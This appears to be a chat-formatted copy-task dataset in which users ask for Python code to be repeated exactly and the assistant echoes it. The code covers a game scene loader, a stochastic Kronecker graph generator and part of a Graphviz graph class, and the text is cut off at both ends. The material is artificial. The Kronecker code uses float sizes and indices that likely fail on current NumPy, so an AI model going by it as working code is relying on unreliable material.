jsonmanager.check_for_file(path)\n```<|memory_end|>\nProduce the code text exactly, no additions or omissions.",
"role": "user"
}
] |
```python
import controller.component
from util import jsonmanager, debug, configuration
from view.entity import Entity
class Scene:
def __init__(self, name, entities_data):
self.name = name
self.entities = []
self.started_entities = []
self.event_input = None
self.cont_input = None
for entity_data in entities_data:
position = (entity_data["X"], entity_data["Y"])
entity = Entity(entity_data["Name"], position)
for component_data in entity_data["Components"]:
try:
component_constructor = getattr(controller.component, component_data["Type"])
component = component_constructor()
component.scene = self
data = component_data["ComponentData"]
if not len(data) == 0:
component.load_data(data)
entity.add_component(component)
except AttributeError:
debug.log(component_data["Type"] + " not recognised :/")
self.entities.append(entity)
def start(self):
self.event_input = 'none'
self.cont_input = 'none'
while not self.ready_to_start():
debug.log('preparing to start entities...')
entities_to_start = []
for ent in self.entities:
if not ent.is_started():
entities_to_start.append(ent)
debug.log(str(len(entities_to_start)) + ' entities ready to start.')
debug.log('starting...')
for entity in entities_to_start:
try:
entity.start()
except Exception as e:
debug.log('could not start entity. Logging error:')
debug.log(e)
debug.log('started {0} entities :)'.format(len(self.entities)))
def update(self, event_input, cont_input):
self.event_input = event_input
self.cont_input = cont_input
for entity in self.entities:
entity.update()
def find_entity(self, entity_name):
for entity in self.entities:
if entity.name == entity_name:
return entity
return None
def add_entity(self, entity):
self.entities.append(entity)
def ready_to_start(self):
for entity in self.entities:
if not entity.is_started():
return False
return True
class SceneManager:
@staticmethod
def get_path(scene_name):
return configuration.scene_data_folder_path + scene_name + '.json'
@staticmethod
def load_scene(scene_name):
path = SceneManager.get_path(scene_name)
scene_data = jsonmanager.get_data(path)
return Scene(scene_name, scene_data['Entities'])
@staticmethod
def check_if_scene_exists(scene_name):
path = SceneManager.get_path(scene_name)
return jsonmanager.check_for_file(path)
```
|
[
{
"content": "Repeat the following code:\n```python\nimport numpy as np\nimport networkx as nx\nimport math\nimport random\n\n\ndef convert(something):#use networkx conversion from numpy array\n #g = nx.from_numpy_matrix(someNPMat)\n g = nx.to_networkx_graph(something)\n return g\n\ndef deleteSelfLoops(graph, nNodes): #used to take away self loops in final graph for stat purposes\n nNodes = int(nNodes)\n for i in range(nNodes):\n for j in range(nNodes):\n if(i == j):\n graph[i, j] = 0\n return graph\n \n\ndef generateStochasticKron(initMat, k, deleteSelfLoopsForStats=False, directed=False, customEdges=False, edges=0):\n initN = initMat.getNumNodes()\n nNodes = math.pow(initN, k)#get final size and make empty 'kroned' matrix\n mtxDim = initMat.getNumNodes()\n mtxSum = initMat.getMtxSum()\n if(customEdges == True):\n nEdges = edges\n if(nEdges > (nNodes*nNodes)):\n raise ValueError(\"More edges than possible with number of Nodes\")\n else:\n nEdges = math.pow(mtxSum, k) #get number of predicted edges\n collisions = 0\n\n print (\"Edges: \")\n print (nEdges)\n print (\"Nodes: \")\n print (nNodes)\n \n #create vector for recursive matrix probability\n probToRCPosV = []\n cumProb = 0.0\n for i in range(mtxDim):\n for j in range(mtxDim):\n prob = initMat.getValue(i, j)\n if(prob > 0.0):\n cumProb += prob\n probToRCPosV.append((cumProb/mtxSum, i, j))\n #print \"Prob Vector Value:\" #testing\n #print cumProb/mtxSum #testing\n\n #add Nodes\n finalGraph = np.zeros((nNodes, nNodes))\n #add Edges\n e = 0\n #print nEdges #testing\n while(e < nEdges):\n rng = nNodes\n row = 0\n col = 0\n for t in range(k):\n prob = random.uniform(0, 1)\n #print \"prob:\" #testing\n #print prob #testing\n n = 0\n while(prob > probToRCPosV[n][0]):\n n += 1\n mrow = probToRCPosV[n][1]\n mcol = probToRCPosV[n][2]\n rng /= mtxDim\n row += mrow * rng\n col += mcol * rng\n if(finalGraph[row, col] == 0): #if there is no edge\n finalGraph[row, col] = 1\n e += 1\n if(not directed): #symmetry if not directed\n if(row != col):\n finalGraph[col, row] = 1\n e += 1\n else:\n collisions += 1\n print (\"Collisions: \")\n print (collisions) #testing\n #delete self loops if needed for stats\n if(deleteSelfLoopsForStats):\n finalGraph = deleteSelfLoops(finalGraph, nNodes)\n finalGraph = convert(finalGraph)\n return finalGraph\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the following code:\n<|memory_start|>```python\nimport numpy as np\nimport networkx as nx\nimport math\nimport random\n\n\ndef convert(something):#use networkx conversion from numpy array\n #g = nx.from_numpy_matrix(someNPMat)\n g = nx.to_networkx_graph(something)\n return g\n\ndef deleteSelfLoops(graph, nNodes): #used to take away self loops in final graph for stat purposes\n nNodes = int(nNodes)\n for i in range(nNodes):\n for j in range(nNodes):\n if(i == j):\n graph[i, j] = 0\n return graph\n \n\ndef generateStochasticKron(initMat, k, deleteSelfLoopsForStats=False, directed=False, customEdges=False, edges=0):\n initN = initMat.getNumNodes()\n nNodes = math.pow(initN, k)#get final size and make empty 'kroned' matrix\n mtxDim = initMat.getNumNodes()\n mtxSum = initMat.getMtxSum()\n if(customEdges == True):\n nEdges = edges\n if(nEdges > (nNodes*nNodes)):\n raise ValueError(\"More edges than possible with number of Nodes\")\n else:\n nEdges = math.pow(mtxSum, k) #get number of predicted edges\n collisions = 0\n\n print (\"Edges: \")\n print (nEdges)\n print (\"Nodes: \")\n print (nNodes)\n \n #create vector for recursive matrix probability\n probToRCPosV = []\n cumProb = 0.0\n for i in range(mtxDim):\n for j in range(mtxDim):\n prob = initMat.getValue(i, j)\n if(prob > 0.0):\n cumProb += prob\n probToRCPosV.append((cumProb/mtxSum, i, j))\n #print \"Prob Vector Value:\" #testing\n #print cumProb/mtxSum #testing\n\n #add Nodes\n finalGraph = np.zeros((nNodes, nNodes))\n #add Edges\n e = 0\n #print nEdges #testing\n while(e < nEdges):\n rng = nNodes\n row = 0\n col = 0\n for t in range(k):\n prob = random.uniform(0, 1)\n #print \"prob:\" #testing\n #print prob #testing\n n = 0\n while(prob > probToRCPosV[n][0]):\n n += 1\n mrow = probToRCPosV[n][1]\n mcol = probToRCPosV[n][2]\n rng /= mtxDim\n row += mrow * rng\n col += mcol * rng\n if(finalGraph[row, col] == 0): #if there is no edge\n finalGraph[row, col] = 1\n e += 1\n if(not directed): #symmetry if not directed\n if(row != col):\n finalGraph[col, row] = 1\n e += 1\n else:\n collisions += 1\n print (\"Collisions: \")\n print (collisions) #testing\n #delete self loops if needed for stats\n if(deleteSelfLoopsForStats):\n finalGraph = deleteSelfLoops(finalGraph, nNodes)\n finalGraph = convert(finalGraph)\n return finalGraph\n```<|memory_end|>",
"role": "user"
}
] |
```python
import numpy as np
import networkx as nx
import math
import random
def convert(something):#use networkx conversion from numpy array
#g = nx.from_numpy_matrix(someNPMat)
g = nx.to_networkx_graph(something)
return g
def deleteSelfLoops(graph, nNodes): #used to take away self loops in final graph for stat purposes
nNodes = int(nNodes)
for i in range(nNodes):
for j in range(nNodes):
if(i == j):
graph[i, j] = 0
return graph
def generateStochasticKron(initMat, k, deleteSelfLoopsForStats=False, directed=False, customEdges=False, edges=0):
initN = initMat.getNumNodes()
nNodes = math.pow(initN, k)#get final size and make empty 'kroned' matrix
mtxDim = initMat.getNumNodes()
mtxSum = initMat.getMtxSum()
if(customEdges == True):
nEdges = edges
if(nEdges > (nNodes*nNodes)):
raise ValueError("More edges than possible with number of Nodes")
else:
nEdges = math.pow(mtxSum, k) #get number of predicted edges
collisions = 0
print ("Edges: ")
print (nEdges)
print ("Nodes: ")
print (nNodes)
#create vector for recursive matrix probability
probToRCPosV = []
cumProb = 0.0
for i in range(mtxDim):
for j in range(mtxDim):
prob = initMat.getValue(i, j)
if(prob > 0.0):
cumProb += prob
probToRCPosV.append((cumProb/mtxSum, i, j))
#print "Prob Vector Value:" #testing
#print cumProb/mtxSum #testing
#add Nodes
finalGraph = np.zeros((nNodes, nNodes))
#add Edges
e = 0
#print nEdges #testing
while(e < nEdges):
rng = nNodes
row = 0
col = 0
for t in range(k):
prob = random.uniform(0, 1)
#print "prob:" #testing
#print prob #testing
n = 0
while(prob > probToRCPosV[n][0]):
n += 1
mrow = probToRCPosV[n][1]
mcol = probToRCPosV[n][2]
rng /= mtxDim
row += mrow * rng
col += mcol * rng
if(finalGraph[row, col] == 0): #if there is no edge
finalGraph[row, col] = 1
e += 1
if(not directed): #symmetry if not directed
if(row != col):
finalGraph[col, row] = 1
e += 1
else:
collisions += 1
print ("Collisions: ")
print (collisions) #testing
#delete self loops if needed for stats
if(deleteSelfLoopsForStats):
finalGraph = deleteSelfLoops(finalGraph, nNodes)
finalGraph = convert(finalGraph)
return finalGraph
```
|
[
{
"content": "Here is the code block:\n```python\n#------------------------------------------------------------------------------\n# Copyright (c) 2009 Richard W. Lincoln\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n#------------------------------------------------------------------------------\n\n\"\"\" Defines a representation of a graph in Graphviz's dot language.\n\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports:\n#------------------------------------------------------------------------------\n\nimport os\nimport subprocess\nimport tempfile\nimport math\nimport logging\n\nfrom enthought.traits.api import \\\n HasTraits, Any, Instance, Trait, Tuple, Bool, Str, Enum, Float, Color, \\\n Either, Range, Int, Font, List, Directory, ListInstance, This, Property, \\\n Dict, on_trait_change\n\nfrom enthought.traits.trait_handlers import TraitListEvent\n\nfrom enthought.traits.ui.api import View, Group, Item, Tabbed\nfrom enthought.pyface.image_resource import ImageResource\nfrom enthought.enable.api import Canvas, Viewport, Container\nfrom enthought.enable.tools.api import ViewportPanTool, ViewportZoomTool\nfrom enthought.enable.component_editor import ComponentEditor\n\nfrom common import \\\n Alias, color_scheme_trait, rectangle_trait, fontcolor_trait, \\\n fontname_trait, fontsize_trait, label_trait, point_trait, pointf_trait, \\\n nojustify_trait, root_trait, showboxes_trait, target_trait, margin_trait\n\nfrom godot.base_graph import BaseGraph\nfrom godot.node import Node\nfrom godot.edge import Edge\nfrom godot.subgraph import Subgraph\nfrom godot.cluster import Cluster\n\nfrom godot.ui.graph_view import graph_view, tabbed_view\n\n#------------------------------------------------------------------------------\n# Logging:\n#------------------------------------------------------------------------------\n\nlogger = logging.getLogger(__name__)\n\n#------------------------------------------------------------------------------\n# Trait definitions:\n#------------------------------------------------------------------------------\n\ncluster_mode_trait = Enum(\n \"local\", \"global\", \"none\", desc=\"mode used for handling clusters\",\n label=\"Cluster rank\", graphviz=True\n)\n\nstart_trait = Enum(\"regular\", \"self\", \"random\", graphviz=True)\n\n#------------------------------------------------------------------------------\n# \"Graph\" class:\n#------------------------------------------------------------------------------\n\nclass Graph(BaseGraph):\n \"\"\" Defines a representation of a graph in Graphviz's dot language.\n \"\"\"\n\n #--------------------------------------------------------------------------\n # Trait definitions.\n #--------------------------------------------------------------------------\n\n # A strict graph is an unweighted, undirected graph containing no\n # graph loops or multiple edges.\n strict = Bool(False, desc=\"A strict graph is an unweighted, \"\n \"undirected graph containing no graph loops or multiple edges.\" )\n\n # Do edges have direction?\n directed = Bool(False, desc=\"directed edges.\")\n\n # All graphs, subgraphs and clusters.\n all_graphs = Property( List(Instance(BaseGraph)) )\n\n #--------------------------------------------------------------------------\n # Dot trait definitions.\n #--------------------------------------------------------------------------\n\n # Bounding box of drawing in integer points.\n bb = rectangle_trait\n\n # When attached to the root graph, this color is used as the background for\n # entire canvas. When a cluster attribute, it is used as the initial\n # background for the cluster. If a cluster has a filled\n # <html:a rel=\"attr\">style</html:a>, the\n # cluster's <html:a rel=\"attr\">fillcolor</html:a> will overlay the\n # background color.\n #\n # If no background color is specified for the root graph, no graphics\n # operation are performed on the background. This works fine for\n # PostScript but for bitmap output, all bits are initialized to something.\n # This means that when the bitmap output is included in some other\n # document, all of the bits within the bitmap's bounding box will be\n # set, overwriting whatever color or graphics where already on the page.\n # If this effect is not desired, and you only want to set bits explicitly\n # assigned in drawing the graph, set <html:a rel=\"attr\">bgcolor</html:a>=\"transparent\".\n bgcolor = Color(\"white\", desc=\"color used as the background for the \"\n \"entire canvas\", label=\"Background Color\", graphviz=True)\n\n # If true, the drawing is centered in the output canvas.\n center = Bool(False, desc=\"is drawing centered in the output canvas\",\n graphviz=True)\n\n # Specifies the character encoding used when interpreting string input\n # as a text label. The default value is <html:span class=\"val\">UTF-8</html:span>.\n # The other legal value is <html:span class=\"val\">iso-8859-1</html:span> or,\n # equivalently,\n # <html:span class=\"val\">Latin1</html:span>. The <html:a rel=\"attr\">charset</html:a> attribute is case-insensitive.\n # Note that if the character encoding used in the input does not\n # match the <html:a rel=\"attr\">charset</html:a> value, the resulting output may be very strange.\n charset = Str(\"UTF-8\", label=\"Character encoding\", graphviz=True)\n\n # Mode used for handling clusters. If <html:a rel=\"attr\">clusterrank</html:a> is <html:span class=\"val\">local</html:span>, a\n # subgraph whose name begins with \"cluster\" is given special treatment.\n # The subgraph is laid out separately, and then integrated as a unit into\n # its parent graph, with a bounding rectangle drawn about it.\n # If the cluster has a <html:a rel=\"attr\">label</html:a> parameter, this label\n # is displayed within the rectangle.\n # Note also that there can be clusters within clusters.\n # At present, the modes <html:span class=\"val\">global</html:span> and <html:span class=\"val\">none</html:span>\n # appear to be identical, both turning off the special cluster processing.\n clusterrank = cluster_mode_trait\n\n # This attribute specifies a color scheme namespace. If defined, it specifies\n # the context for interpreting color names. In particular, if a\n # <html:a rel=\"type\">color</html:a> value has form <html:code>xxx</html:code> or <html:code>//xxx</html:code>,\n # then the color <html:code>xxx</html:code> will be evaluated according to the current color scheme.\n # If no color scheme is set, the standard X11 naming is used.\n # For example, if <html:code>colorscheme=bugn9</html:code>, then <html:code>color=7</html:code>\n # is interpreted as <html:code>/bugn9/7</html:code>.\n colorscheme = color_scheme_trait\n\n # Comments are inserted into output. Device-dependent.\n comment = Str(desc=\"comments are inserted into output\", graphviz=True)\n\n # If <html:span class=\"val\">true</html:span>, allow edges between clusters.\n # (See <html:a rel=\"attr\">lhead</html:a> and <html:a rel=\"attr\">ltail</html:a> below.)\n compound = Bool(False, desc=\"edges allowed between clusters\",\n graphviz=True)\n\n # If <html:span class=\"val\">true</html:span>, use edge concentrators.\n concentrate = Bool(False, desc=\"edge concentrators\", graphviz=True)\n\n # Factor damping force motions. On each iteration, a nodes movement\n # is limited to this factor of its potential motion. By being less than\n # 1.0, the system tends to \"cool\", thereby preventing cycling.\n Damping = Float(0.99, desc=\"factor damping force motions\", graphviz=True)\n\n # This specifies the distance between nodes in separate connected\n # components. If set too small, connected components may overlap.\n # Only applicable if <html:a rel=\"attr\">pack</html:a>=false.\n defaultdist = Float(desc=\"distance between nodes in separate connected \"\n \"components\", label=\"Default distance\", graphviz=True)\n\n # Set the number of dimensions used for the layout. The maximum value\n # allowed is 10.\n dim = Range(low=2, high=10, desc=\"number of dimensions for the layout\",\n label=\"Dimensions\", graphviz=True)\n\n # Only valid when mode=\"ipsep\". If true, constraints are generated for each\n # edge in the largest (heuristic) directed acyclic subgraph such that the\n # edge must point downwards. If \"hier\", generates level constraints similar\n # to those used with mode=\"hier\". The main difference is that, in the\n # latter case, only these constraints are involved, so a faster solver can\n # be used.\n diredgeconstraints = Enum(True, \"heir\", label=\"Edge constraints\",\n graphviz=True)\n\n # This specifies the expected number of pixels per inch on a display device.\n # For bitmap output, this guarantees that text rendering will be\n # done more accurately, both in size and in placement. For SVG output,\n # it is used to guarantee that the dimensions in the output correspond to\n # the correct number of points or inches.\n dpi = Float(96.0, desc=\"expected number of pixels per inch on a display\",\n label=\"DPI\", graphviz=True)\n\n # Terminating condition. If the length squared of all energy gradients are\n # < <html:a rel=\"attr\">epsilon</html:a>, the algorithm stops.\n epsilon = Float(0.0001, desc=\"terminating condition\", graphviz=True)\n\n # Fraction to increase polygons (multiply\n # coordinates by 1 + esep) for purposes of spline edge routing.\n # This should normally be strictly less than\n # <html:a rel=\"attr\">sep</html:a>.\n esep = Int(3, desc=\"Fraction to increase polygons (multiply coordinates \"\n \"by 1 + esep) for purposes of spline edge routing\",\n label=\"Edge separation\", graphviz=True)\n\n # Color used for text.\n fontcolor = fontcolor_trait\n\n # Font used for text. This very much depends on the output format and, for\n # non-bitmap output such as PostScript or SVG, the availability of the font\n # when the graph is displayed or printed. As such, it is best to rely on\n # font faces that are generally available, such as Times-Roman, Helvetica or\n # Courier.\n #\n # If Graphviz was built using the\n # <html:a href=\"http://pdx.freedesktop.org/~fontconfig/fontconfig-user.html\">fontconfig library</html:a>, the latter library\n # will be used to search for the font. However, if the <html:a rel=\"attr\">fontname</html:a> string\n # contains a slash character \"/\", it is treated as a pathname for the font\n # file, though font lookup will append the usual font suffixes.\n #\n # If Graphviz does not use fontconfig, <html:a rel=\"attr\">fontname</html:a> will be\n # considered the name of a Type 1 or True Type font file.\n # If you specify <html:code>fontname=schlbk</html:code>, the tool will look for a\n # file named <html:code>schlbk.ttf</html:code> or <html:code>schlbk.pfa</html:code> or <html:code>schlbk.pfb</html:code>\n # in one of the directories specified by\n # the <html:a rel=\"attr\">fontpath</html:a> attribute.\n # The lookup does support various aliases for the common fonts.\n fontname = fontname_trait\n\n # Allows user control of how basic fontnames are represented in SVG output.\n # If <html:a rel=\"attr\">fontnames</html:a> is undefined or <html:span class=\"val\">svg</html:span>,\n # the output will try to use known SVG fontnames. For example, the\n # default font <html:code>Times-Roman</html:code> will be mapped to the\n # basic SVG font <html:code>serif</html:code>. This can be overridden by setting\n # <html:a rel=\"attr\">fontnames</html:a> to <html:span class=\"val\">ps</html:span> or <html:span class=\"val\">gd</html:span>.\n # In the former case, known PostScript font names such as\n # <html:code>Times-Roman</html:code> will be used in the output.\n # In the latter case, the fontconfig font conventions\n # are used. Thus, <html:code>Times-Roman</html:code> would be treated as\n # <html:code>Nimbus Roman No9 L</html:code>. These last two options are useful\n # with SVG viewers that support these richer fontname spaces.\n fontnames = Enum(\"svg\", \"ps\", \"gd\", label=\"Font names\",\n desc=\"how basic fontnames are represented in SVG output\",\n graphviz=True)\n\n # Directory list used by libgd to search for bitmap fonts if Graphviz\n # was not built with the fontconfig library.\n # If <html:a rel=\"attr\">fontpath</html:a> is not set, the environment\n # variable <html:code>DOTFONTPATH</html:code> is checked.\n # If that is not set, <html:code>GDFONTPATH</html:code> is checked.\n # If not set, libgd uses its compiled-in font path.\n # Note that fontpath is an attribute of the root graph.\n fontpath = List(Directory, label=\"Font path\", graphviz=True)\n\n # Font size, in <html:a rel=\"note\">points</html:a>, used for text.\n fontsize = fontsize_trait\n\n # Spring constant used in virtual physical model. It roughly corresponds to\n # an ideal edge length (in inches), in that increasing K tends to increase\n # the distance between nodes. Note that the edge attribute len can be used\n # to override this value for adjacent nodes.\n K = Float(0.3, desc=\"spring constant used in virtual physical model\",\n graphviz=True)\n\n # Text label attached to objects.\n # If a node's <html:a rel=\"attr\">shape</html:a> is record, then the label can\n # have a <html:a href=\"http://www.graphviz.org/doc/info/shapes.html#record\">special format</html:a>\n # which describes the record layout.\n label = label_trait\n\n # Justification for cluster labels. If <html:span class=\"val\">r</html:span>, the label\n # is right-justified within bounding rectangle; if <html:span class=\"val\">l</html:span>, left-justified;\n # else the label is centered.\n # Note that a subgraph inherits attributes from its parent. Thus, if\n # the root graph sets <html:a rel=\"attr\">labeljust</html:a> to <html:span class=\"val\">l</html:span>, the subgraph inherits\n # this value.\n labeljust = Trait(\"c\", {\"Centre\": \"c\", \"Right\": \"r\", \"Left\": \"l\"},\n desc=\"justification for cluster labels\", label=\"Label justification\",\n graphviz=True)\n\n # Top/bottom placement of graph and cluster labels.\n # If the attribute is <html:span class=\"val\">t</html:span>, place label at the top;\n # if the attribute is <html:span class=\"val\">b</html:span>, place label at the bottom.\n # By default, root\n # graph labels go on the bottom and cluster labels go on the top.\n # Note that a subgraph inherits attributes from its parent. Thus, if\n # the root graph sets <html:a rel=\"attr\">labelloc</html:a> to <html:span class=\"val\">b</html:span>, the subgraph inherits\n # this value.\n labelloc = Trait(\"b\", {\"Bottom\": \"b\", \"Top\":\"t\"},\n desc=\"placement of graph and cluster labels\",\n label=\"Label location\", graphviz=True)\n\n # If true, the graph is rendered in landscape mode. Synonymous with\n # <html:code><html:a rel=\"attr\">rotate</html:a>=90</html:code> or <html:code>\n # <html:a rel=\"attr\">orientation</html:a>=landscape</html:code>.\n landscape = Bool(False, desc=\"rendering in landscape mode\", graphviz=True)\n\n # Specifies a linearly ordered list of layer names attached to the graph\n # The graph is then output in separate layers. Only those components\n # belonging to the current output layer appear. For more information,\n # see the page <html:a href=\"http://www.graphviz.org/Documentation/html/layers/\">How to use drawing layers (overlays)</html:a>.\n layers = Str(desc=\"a linearly ordered list of layer names\",\n graphviz=True)\n\n # Specifies the separator characters used to split the\n # <html:a rel=\"attr\">layers </html:a>attribute into a list of layer names.\n layersep = Enum(\":\\t\", \"\\t\", \" \", label=\"Layer separation\",\n desc=\"separator characters used to split layer names\", graphviz=True)\n\n # Specifies strictness of level constraints in neato\n # when <html:code><html:a rel=\"attr\">mode</html:a>=\"ipsep\" or \"hier\"</html:code>.\n # Larger positive values mean stricter constraints, which demand more\n # separation between levels. On the other hand, negative values will relax\n # the constraints by allowing some overlap between the levels.\n levelsgap = Float(0.0, desc=\"strictness of level constraints in neato\",\n label=\"Levels gap\", graphviz=True)\n\n # Label position, in points. The position indicates the center of the\n # label.\n lp = point_trait\n\n # For graphs, this sets x and y margins of canvas, in inches. If the margin\n # is a single double, both margins are set equal to the given value.\n #\n # Note that the margin is not part of the drawing but just empty space\n # left around the drawing. It basically corresponds to a translation of\n # drawing, as would be necessary to center a drawing on a page. Nothing\n # is actually drawn in the margin. To actually extend the background of\n # a drawing, see the <html:a rel=\"attr\">pad</html:a> attribute.\n #\n # For nodes, this attribute specifies space left around the node's label.\n # By default, the value is <html:code>0.11,0.055</html:code>.\n margin = margin_trait#Either(Float, pointf_trait, desc=\"x and y margins of canvas\")\n\n # Sets the number of iterations used.\n maxiter = Int(200, desc=\"number of iterations used\",\n label=\"Maximum iterations\", graphviz=True)\n\n # Multiplicative scale factor used to alter the MinQuit (default = 8)\n # and MaxIter (default = 24) parameters used during crossing\n # minimization. These correspond to the\n # number of tries without improvement before quitting and the\n # maximum number of iterations in each pass.\n mclimit = Float(1.0, desc=\"Multiplicative scale factor used to alter the \"\n \"MinQuit (default = 8) and MaxIter (default = 24) parameters used \"\n \"during crossing minimization\", label=\"Multiplicative scale factor\",\n graphviz=True)\n\n # Specifies the minimum separation between all nodes.\n mindist = Float(1.0, desc=\"minimum separation between all nodes\",\n label=\"Minimum separation\", graphviz=True)\n\n # Technique for optimizing the layout. If <html:a rel=\"attr\">mode</html:a> is <html:span class=\"val\">major</html:span>,\n # neato uses stress majorization. If <html:a rel=\"attr\">mode</html:a> is <html:span class=\"val\">KK</html:span>,\n # neato uses a version of the gradient descent method. The only advantage\n # to the latter technique is that it is sometimes appreciably faster for\n # small (number of nodes < 100) graphs. A significant disadvantage is that\n # it may cycle.\n #\n # There are two new, experimental modes in neato, <html:span class=\"val\">hier</html:span>, which adds a top-down\n # directionality similar to the layout used in dot, and <html:span class=\"val\">ipsep</html:span>, which\n # allows the graph to specify minimum vertical and horizontal distances\n # between nodes. (See the <html:a rel=\"attr\">sep</html:a> attribute.)\n mode = Enum(\"major\", \"KK\", \"heir\", \"ipsep\",\n desc=\"Technique for optimizing the layout\", graphviz=True)\n\n # This value specifies how the distance matrix is computed for the input\n # graph. The distance matrix specifies the ideal distance between every\n # pair of nodes. neato attemps to find a layout which best achieves\n # these distances. By default, it uses the length of the shortest path,\n # where the length of each edge is given by its <html:a rel=\"attr\">len</html:a>\n # attribute. If <html:a rel=\"attr\">model</html:a> is <html:span class=\"val\">circuit</html:span>, neato uses the\n # circuit resistance\n # model to compute the distances. This tends to emphasize clusters. If\n # <html:a rel=\"attr\">model</html:a> is <html:span class=\"val\">subset</html:span>, neato uses the subset model. This sets the\n # edge length to be the number of nodes that are neighbors of exactly one\n # of the end points, and then calculates the shortest paths. This helps\n # to separate nodes with high degree.\n model = Enum(\"shortpath\", \"circuit\", \"subset\",\n desc=\"how the distance matrix is computed for the input graph\",\n graphviz=True)\n\n # If Graphviz is built with MOSEK defined, mode=ipsep and mosek=true,\n # the Mosek software (www.mosek.com) is use to solve the ipsep constraints.\n mosek = Bool(False, desc=\"solve the ipsep constraints with MOSEK\",\n graphviz=True)\n\n # Minimum space between two adjacent nodes in the same rank, in inches.\n nodesep = Float(0.25, desc=\"minimum space between two adjacent nodes in \"\n \"the same rank\", label=\"Node separation\", graphviz=True)\n\n # By default, the justification of multi-line labels is done within the\n # largest context that makes sense. Thus, in the label of a polygonal node,\n # a left-justified line will align with the left side of the node (shifted\n # by the prescribed margin). In record nodes, left-justified line will line\n # up with the left side of the enclosing column of fields. If nojustify is\n # \"true\", multi-line labels will be justified in the context of itself. For\n # example, if the attribute is set, the first label line is long, and the\n # second is shorter and left-justified, the second will align with the\n # left-most character in the first line, regardless of how large the node\n # might be.\n nojustify = nojustify_trait\n\n # If set, normalize coordinates of final\n # layout so that the first point is at the origin, and then rotate the\n # layout so that the first edge is horizontal.\n normalize = Bool(False, desc=\"If set, normalize coordinates of final \"\n \"layout so that the first point is at the origin, and then rotate the \"\n \"layout so that the first edge is horizontal\", graphviz=True)\n\n # Used to set number of iterations in\n # network simplex applications, used in\n # computing node x coordinates.\n # If defined, # iterations = <html:a rel=\"attr\">nslimit</html:a> * # nodes;\n # otherwise, # iterations = MAXINT.\n nslimit = Float(desc=\"iterations in network simplex applications\",\n label=\"x-coordinate limit\", graphviz=True)\n\n # Used to set number of iterations in\n # network simplex applications, used for ranking nodes.\n # If defined, # iterations = <html:a rel=\"attr\">nslimit1</html:a> * # nodes;\n # otherwise, # iterations = MAXINT.\n nslimit1 = Float(desc=\"iterations in network simplex applications\",\n label=\"Ranking limit\", graphviz=True)\n\n # If \"out\" for a graph G, and n is a node in G, then edges n->* appear\n # left-to-right in the same order in which they are defined.\n # If \"in\", the edges *->n appear\n # left-to-right in the same order in which they are defined for all\n # nodes n.\n ordering = Enum(\"out\", \"in\", desc=\"If 'out' for a graph G, and n is a \"\n \"node in G, then edges n->* appear left-to-right in the same order in \"\n \"which they are defined. If 'in', the edges *->n appear left-to-right \"\n \"in the same order in which they are defined for all nodes n.\",\n graphviz=True)\n\n # These specify the order in which nodes and edges are drawn in concrete\n # output. The default \"breadthfirst\" is the simplest, but when the graph\n # layout does not avoid edge-node overlap, this mode will sometimes have\n # edges drawn over nodes and sometimes on top of nodes. If the mode\n # \"nodesfirst\" is chosen, all nodes are drawn first, followed by the\n # edges. This guarantees an edge-node overlap will not be mistaken for\n # an edge ending at a node. On the other hand, usually for aesthetic\n # reasons, it may be desirable that all edges appear beneath nodes,\n # even if the resulting drawing is ambiguous. This can be achieved by\n # choosing \"edgesfirst\".\n outputorder = Enum(\"breadthfirst\", \"nodesfirst\", \"edgesfirst\",\n desc=\"order in which nodes and edges are drawn\", label=\"Output order\",\n graphviz=True)\n\n # Determines if and how node overlaps should be removed. Nodes are first\n # enlarged using the <html:a rel=\"attr\">sep</html:a> attribute.\n # If <html:span class=\"val\">true</html:span>, overlaps are retained.\n # If the value is <html:span class=\"val\">scale</html:span>, overlaps are removed by uniformly scaling in x and y.\n # If the value converts to <html:span class=\"val\">false</html:span>, node overlaps are removed by a\n # Voronoi-based technique.\n # If the value is <html:span class=\"val\">scalexy</html:span>, x and y are separately\n # scaled to remove overlaps.\n # If the value is <html:span class=\"val\">orthoxy</html:span> or <html:span class=\"val\">orthoyx</html:span>, overlaps\n # are moved by optimizing two constraint problems, one for the x axis and\n # one for the y. The suffix indicates which axis is processed first.\n # If the value is <html:span class=\"val\">ortho</html:span>, the technique is similar to <html:span class=\"val\">orthoxy</html:span> except a\n # heuristic is used to reduce the bias between the two passes.\n # If the value is <html:span class=\"val\">ortho_yx</html:span>, the technique is the same as <html:span class=\"val\">ortho</html:span>, except\n # the roles of x and y are reversed.\n # The values <html:span class=\"val\">portho</html:span>, <html:span class=\"val\">porthoxy</html:span>, <html:span class=\"val\">porthoxy</html:span>, and <html:span class=\"val\">portho_yx</html:span> are similar\n # to the previous four, except only pseudo-orthogonal ordering is\n # enforced.\n #\n # If the value is <html:span class=\"val\">compress</html:span>, the layout will be scaled down as much as\n # possible without introducing any overlaps, obviously assuming there are\n # none to begin with.\n #\n # If the value is <html:span class=\"val\">ipsep</html:span>, and the layout is done by neato with\n # <html:a rel=\"attr\">mode</html:a>=\"ipsep\", the overlap removal constraints are\n # incorporated into the layout algorithm itself.\n # N.B. At present, this only supports one level of clustering.\n #\n # If the value is <html:span class=\"val\">vpsc</html:span>, overlap removal is similarly to <html:span class=\"val\">ortho</html:span>, except\n # quadratic optimization is used to minimize node displacement.\n # N.B. At present, this mode only works when <html:a rel=\"attr\">mode</html:a>=\"ipsep\".\n #\n # Except for fdp, the layouts assume <html:code>overlap=\"true\"</html:code> as the default.\n # Fdp first uses a number of passes using built-in, force-directed technique\n # to remove overlaps. Thus, 